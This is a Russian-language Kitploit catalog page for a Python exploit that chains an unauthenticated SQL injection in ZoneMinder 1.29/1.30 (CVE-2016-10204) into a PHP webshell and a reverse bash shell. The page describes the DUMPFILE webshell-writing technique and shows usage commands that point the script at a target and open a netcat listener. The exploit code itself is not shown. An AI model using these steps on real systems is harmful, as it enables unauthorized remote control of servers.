Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zoneminder-1.29-1.30-rce-exploit — Неаутентифицированная SQL-инъекция с переходом к RCE для ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC на Python: от SQLi одной командой до веб-шелла и обратного шелла. | Kitploit
Инструменты/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

Неаутентифицированная SQL-инъекция с переходом к RCE для ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC на Python: от SQLi одной командой до веб-шелла и обратного шелла.

Репозиторий
18 ч 3 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ZoneMinder 1.29/1.30 SQLi to RCE Exploit

Готовый к запуску Python-эксплойт для ZoneMinder 1.29/1.30, который объединяет неаутентифицированную SQL-инъекцию (CVE-2016-10204, EDB-41239) вплоть до интерактивного обратного шелла.

Это вооружённый/автоматизированный PoC для известной, уже исправленной CVE, а не новый эксплойт.

EDB PoC для этой уязвимости останавливается на SQLi-пейлоаде или совете «натравить на это sqlmap». Этот эксплойт упаковывает всю цепочку SQLi → вебшелл → шелл в один читаемый скрипт.

Что он делает

  1. Подтверждает инъекцию с помощью time-based (SLEEP) пробы на POST-параметре limit в index.php?view=request&request=log&task=query.
  2. Записывает небольшой PHP-вебшелл в веб-корень через SELECT ... INTO DUMPFILE, перебирая несколько распространённых путей ZoneMinder/Apache.
  3. Проверяет наличие живого вебшелла, затем запускает обратный bash-шелл на ваш netcat-листенер.

Две подводные камни, которые он обходит

  • DUMPFILE, а не OUTFILE. OUTFILE экранирует переводы строк и портит многострочный PHP; DUMPFILE записывает сырые байты, поэтому вебшелл остаётся валидным.
  • Новое случайное имя файла при каждом запуске. MySQL отказывается перезаписывать существующий файл, поэтому фиксированное имя конфликтует с устаревшим дропом от предыдущего запуска.

Использование

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Благодарности

  • FOXMOLE (основа для advisory по CVE-2016-10204).
  • Оригинальный PoC: Exploit-DB 41239.

Лицензия

MIT, см. LICENSE.

Скачать инструмент